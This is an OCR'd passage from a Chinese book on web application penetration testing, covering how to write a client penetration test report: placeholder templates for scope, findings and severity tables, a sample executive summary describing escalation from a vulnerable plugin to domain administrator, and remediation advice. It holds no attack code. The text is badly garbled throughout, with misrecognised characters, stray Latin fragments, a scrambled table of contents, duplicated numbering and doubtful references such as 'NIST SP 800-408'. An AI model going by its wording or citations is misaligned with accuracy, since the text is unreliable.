口 测试 已 发 现 的 薄弱 组 件 ， 以 获取 访问 权限 。 

口 发 现 和 验证 漏洞 。 

O 按照 风险 级 别 、 潜 在 损失 大 小 和 受 攻 击 的 可 能 性 ， 对 漏洞 排序 。 

a 进行 辅助 研究 和 开发 ， 对 结果 进行 分 析 。 确 定 需 要 立即 处 理 的 问题 ， 提 出 推荐 的 解决 

方法 O 

a 给 出 提高 安全 性 的 建议 。 

口 知识 转移 。 

在 网 络 层 的 安全 检查 中 ,我 们 探查 了 各 个 服务 右 的 端口 ,检测 是 否 有 服务 存在 已 知 安全 漏洞 。 
在 Web 应 用 程序 屋 ， 我 们 检查 了 了 Web 服务 器 的 配置 ， 并 检测 Web 应 用 自身 是 否 存在 风 辑 错误 。 

1.2 范围 

此 次 渗透 测试 的 范围 仅 限 于 下 列 卫 地址 : 

< 卫 地 址 清单 > 

< 卫 地 址 清单 > 


< 卫 地 址 清单 > 
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1.3 主要 发 现 

这 一 节 概 括 了 在 此 次 渗透 测试 中 发 现 的 关键 问题 。 
1.3.1 漏洞 A 

解释 测试 中 发 现 的 漏洞 。 

提出 补救 建议 。 

1.3.2 漏洞 B 

解释 测试 中 发 现 的 漏洞 。 

提出 补救 建议 。 

1.3.2 漏洞 C 

解释 测试 中 发 现 的 漏洞 。 

提出 补救 建议 。 

1.4 建议 

客户 建议 客户 制订 一 个 行动 计划 ， 着 手 解 决 在 此 次 安全 评估 中 发 现 的 问题 。 


这 份 报 告 中 提出 的 建议 分 为 短期 实用 建议 和 长 期 策略 建议 两 类 ,短期 实用 建议 可 以 矫正 紧急 
的 安全 问题 。 长 期 策略 建议 则 关注 整体 环境 、 未 来 趋势 和 引入 安全 最 佳 实践 。 建 议 要 点 如 下 : 

1.4.1 短期 实用 建议 

O 建议 1 

口 建议 2 

口 建议 3 

口 建议 4 

口 建议 5 


1.4.2 长 期 策略 建议 


O 主动 安全 评估 ”遵循 安全 最 佳 实践 ， 客 户 应 当 确 保 其 面 回 互 联网 的 基础 设施 的 任何 重大 变 
更 都 要 再 次 进行 外 部 的 安全 评估 ， 这 种 做 法 可 以 预防 本 文档 推荐 的 变更 对 系统 产生 影响 。 
O 入 侵 检 测 /防御 CIDS/IPS) 可 能 遭 到 恶意 攻击 的 网 络 应 该 具有 检测 入 侵 的 能 力 ， 建 议 为 

此 网 络 选择 一 个 IDS 解 决 方案 。 
a 自动 化 网 络 访问 控制 ”推荐 的 最 佳 实践 是 将 特定 网 络 访问 权限 的 控制 自动 化 。 
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1.5 小 结 
以 下 表格 概括 了 系统 的 漏洞 评估 结 
类 — Fl 描 xh 
系统 漏洞 评估 总 结 
活动 主机 数 100 
安全 漏洞 数 35 
严重 等 级 为 高 、 中 、 低 的 漏洞 数 21 6 8 
2 技术 报告 
2.1 网 络 安全 
2.1.1 条 目 1 
描述 : 
运行 服务 : SMTP、HTTP、POP3、HTTPS 
服务 版 本 信息 : 
分 析 
描述 
严重 等 级 
中 等 
2.1.2 条目 2 
重复 条 目 1 内 容 
总 结 描述 
参考 资料 : http:/www.weblink.com 
2.2 Web 应 用 程序 漏洞 
风险 描述 严重 等 级 可 能 损失 入 侵 概率 推荐 
漏洞 A 高 可 能 损失 入 侵 概 率 推荐 
漏洞 B 高 可 能 损失 入 侵 概 率 推荐 
漏洞 C 高 可 能 损失 入 侵 概 率 推荐 
漏洞 D 中 可 能 损失 入 侵 概 率 推荐 
漏洞 E 中 可 能 损失 入 侵 概 率 推荐 


PAS TRAN 严重 等 级 
Vila] F 低 
idle] G 低 
漏洞 本 低 
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入 侵 概 率 
入 侵 概率 
入 侵 概率 
入 侵 概率 


(C ) 
推荐 
推 芷 
推 存 
Tite 


经 验证 明 , 只 要 集中 解决 这 份 报告 中 列 出 的 问题 ,系统 的 安全 性 就 可 以 得 到 明显 的 改善 。 相 
天 人 员 只 要 了 解 并 严格 执行 安全 最 住 实践 ， 束 能 解决 发 现 的 大 部 分 问题 ， 并 不 需要 融 超 的 技术 
BE JJ O 


附录 

这 一 访 提 供 了 意见 和 结论 表格 中 列 出 的 已 知 源 洞 的 屏 锻 截图 。 
渗透 测试 报告 

AeA: 

地 址 

联系 信息 

服务 提供 商 : 

地 址 

联系 信息 

测试 渗透 报告 一 一 客户 
目录 

执行 摘要 


S 


总 结 
测试 过 程 

网 络 安全 漏洞 评 舍 

Web 服 务 珊 安全 漏洞 评 售 
权限 提升 

长 期 驻守 服务 从 


8.7 Kali 4 & LA 255 


域 权限 提升 
数据 库 数据 利用 
攻击 者 控制 客户 事务 
结论 
建议 
风险 评级 
附录 A: 漏洞 信息 以 及 补救 方法 
漏洞 A 
漏洞 B 
漏洞 C 
漏洞 D 
附录 B: 对 客户 系统 所 做 改动 的 清单 
附录 C: 关于 Offensive Security 公 司 
执行 摘要 
客户 授权 服务 提供 商 对 其 外 部 网 站 进行 渗透 测试 ,测试 评估 的 方式 是 模拟 恶意 的 攻击 者 对 公 
司 进行 目的 明确 的 渗透 ， 从 对 如 下 情况 做 出 判断 。 
Q 远程 攻击 者 是 否 可 以 渗透 客户 的 防御 。 
口 安全 漏洞 对 以 下 方面 的 影响 : 
@ 公司 安全 的 完整 性 ; 
m 公司 信息 的 保密 性 ; 
m 内 部 基础 设施 以 及 客户 信息 系统 的 可 用 性 。 


客户 将 使 用 评估 结果 决定 未 来 信息 安全 计划 的 方向 。 所 有 的 测试 和 操作 都 在 受 控 条 件 下 


完成 


pa zi 


JQ) =A 


服务 提供 商 对 客户 提供 的 地 址 空间 进行 了 网 络 侦察 , 这 段 地 址 空间 即 为 本 次 的 测试 范围 。 服 
务 提 供 商 认为 客户 公司 可 受 外 部 攻击 的 目标 较 少 ,只 有 一 个 外 部 Web 站 点 和 在 网 络 侦察 中 发 现 的 Eo 
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其 他 服务 。 


在 对 客户 主 网 站 的 安全 评估 中 , 我 们 发 现 该 网 站 安 寂 了 一 个 有 安全 汤 洞 的 插件 。 我 们 成 功利 
用 这 个 插件 , 取得 了 管理 权限 , 并 使 用 此 权限 获得 对 搬 层 操作 系统 的 交互 访问 , 提升 到 root 权 限 。 


服务 提供 商 使 用 管理 权限 找到 内 部 网 络 资源 ,利用 内 部 网 络 中 的 一 个 漏洞 得 到 了 本 地 系统 访 
问 权限 ， 进 而 提升 到 域 管理 员 权 限 ， 获 得 了 对 整个 网 络 基础 结构 的 控制 。 


测试 过 程 

< 网 络 汤 洞 评估 详细 信息 > 

< Web 服 务 融 漏 洞 评 佑 详细 信息 > 
< 权限 提升 详细 信息 > 

< 长 期 驻守 服务 珊 详 细 信息 > 

< 域 权 限 提升 详细 信息 > 

< 数据 库 数据 利用 详细 信息 > 


结论 


在 外 部 渗透 测试 过 程 中 , 客户 受到 了 一 系列 的 入 侵 , 其 最 终结 果 将 直接 损害 公司 及 其 顾客 的 
利益 。 
本 次 渗透 测试 的 具体 目标 如 下 。 
口 判断 远程 攻击 者 是 否 可 以 渗透 客户 的 网 络 防 御 。 
O 确定 安全 漏洞 对 以 下 方面 的 影 啊 : 
四 公司 系统 的 完整 性 ; 
m 公司 顾客 信息 的 保密 性 ; 
m 内 部 基础 结构 以 及 客户 信息 系统 的 可 用 性 。 
基于 测试 结果 , 我 们 认为 一 个 远程 攻击 者 能 够 渗透 客户 的 防御 系统 。 初始 的 攻击 载体 是 严重 
风险 ,因为 这 种 攻击 载体 可 以 通 目 动 扫描 发 现 。 如 果 攻 击 者 利用 了 这 种 漏洞 ， 就 可 能 会 导致 客户 
的 网 络 次 病 ， 影 响 客户 的 品牌 形象 。 
建议 
客户 通过 我 们 提供 的 服务 , 积极 管理 技术 风险 和 网 络 安 全 ,对 此 我 们 深 表 赞同 。 根据 此 次 渗 
透 测试 发 现 的 安全 漏洞 对 整个 组 织 的 影响 ， 我 们 建议 客户 调配 合适 的 资源 ， 及 时 采取 补救 措施 。 
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虽然 此 次 测试 不 提供 所 需 补 救 措施 的 完整 列表 ， 我 们 在 此 提出 一 些 概括 性 的 建议 。 


口 补丁 管理 测试 中 发 现 的 很 多 漏洞 可 以 通过 完善 的 补丁 管理 得 到 避免 。 我 们 推荐 客户 遵 
循 NIST SP 800-408 中 列 出 的 指导 方针 ， 制 定 补 丁 管理 的 安全 策略 。 这 样 可 以 降低 系统 中 
存在 漏洞 的 风险 。 

口 在 所 有 系统 中 强制 实行 变更 管理 ”和 常见 的 安全 漏洞 是 由 人 为 错误 导致 的 。 通 过 在 所 有 运 
行 系统 中 实行 严格 的 变更 管理 和 控制 流程 ， 许 多 配置 错误 的 问题 可 以 得 到 避免 。 

口 使 用 多 因素 和 基于 角色 的 访问 控制 ”测试 发 现 ， 一些 核心 系统 只 使 用 了 密码 安全 这 一 种 
方式 进行 授权 用 户 的 验证 。 我 们 推荐 的 最 佳 实践 是 至 少 使 用 两 种 认证 方式 ， 同 时 要 限制 
管理 帐号 的 权限 。 

a 限制 对 核心 系统 的 访问 ”客户 应 该 使 用 whitelists 、ACL 、VLAN 以 及 其 他 方法 ， 将 核心 系 
统 与 其 他 系统 隔离 。 如 果 采 用 最 小 权限 的 设计 概念 ， 可 以 限制 攻击 者 利用 被 侵入 资源 造 
成 的 和 危害。 请 参考 NIST SP 800-27 RevA11， 了 解 如 何 为 IT 系统 建立 一 个 安全 基线 。 


风险 评级 

服务 提供 商 为 客户 发 现 的 风险 可 以 分 为 不 同 级 别 , 有 非 第 严重 的 风险 ,也 有 等 级 较 低 的 风险 ， 
接 下 来 我 们 会 具体 阐述 这 些 风险 等 级 的 内 涵 。 服 务 提 供 商 发 现 了 三 个 非常 严重 的 涯 洞 ， oe Leal 
可 以 用 来 获得 对 客户 内 部 网 络 的 访问 权限 。 

口 严重 立即 影 啊 核心 业务 流程 。 

am 间接 影响 核心 业务 流程 ， 或 者 是 影响 次 要 业务 流程 。 

口中 间接 或 部 分 影响 业务 流程 。 

OK 没有 直接 影响 。 漏 洞 可 能 与 其 他 漏洞 一 起 利用 。 

根据 在 测试 中 系统 发 现 的 最 高 风险 级 别 , 被 测试 系统 的 当前 风险 级 别 为 严重 , 共 发 现 三 个 严 
ES. 、 两 个 中 度 风 险 漏 洞 和 两 个 低 风 险 漏 洞 。 

附录 : 漏洞 信息 以 及 缓解 方法 


< 漏洞 A 信息 > 


8.8 小结 

作为 本 书 的 最 后 一 章 ， 这 一 章 给 出 了 渗透 测试 完成 后 编写 专业 的 客户 提交 报告 的 指导 意见 。 
虽然 侵 人 系统 以 及 其 他 的 技术 工作 非常 有 趣 , 但 是 详尽 的 报告 和 扎实 的 业务 实践 才能 帮 你 挣 钱 养 
家 。 要 想 成 功 地 提供 专业 服务 ， 你 必须 在 相关 领域 成 为 受 人 信赖 的 专家 。 具 体 到 安全 领域 ， 你 必 
须 能 够 帮助 客户 符合 行业 规范 ， 降 低 安 全 漏洞 的 风险 ， 以 及 提高 识别 风险 的 能 

这 一 草 第 一 部 分 内 容 讨论 的 是 肚 从 规范 , 因为 帮助 客户 遵从 规范 是 展示 你 提供 的 服务 价值 的 


258 第 8 章 渗透 测试 执行 报告 


常用 方法 。 我 们 发 现 ， 如 末 客 户 担 心 不 能 达到 规定 , 或 者 近期 遭遇 到 安全 事故 ， 通 第 会 拨 出 预算 
购买 相关 服务 。 因 此 ， 了解 常用 标准 可 以 帮助 你 为 用 户 提供 更 好 的 服务 。 接 着 ,我 们 介绍 了 服务 
收费 的 不 同方 式 , 以 及 在 项 目 报价 时 需要 注意 的 事项 。 然 后 , 我 们 把 交付 报告 分 解 为 不 同 的 部 分 ， 
给 出 了 回 客 户 提交 绪 末 的 最 佳 实 践 。 最 后 一 市 介 绍 了 Kali Linux 提 供 的 一 些 报 表 工 具 ， 这 些 工具 
可 以 帮助 你 生成 信息 ， 在 客户 交付 报告 中 使 用 。 


我 们 很 享受 编 所 这 本 书 的 过 程 , 也 希望 这 本 书 能 够 玫 助 你 实现 你 的 Web 应 用 程序 渗透 测试 目 
标 。 感 谢 你 阅读 本 书 。 
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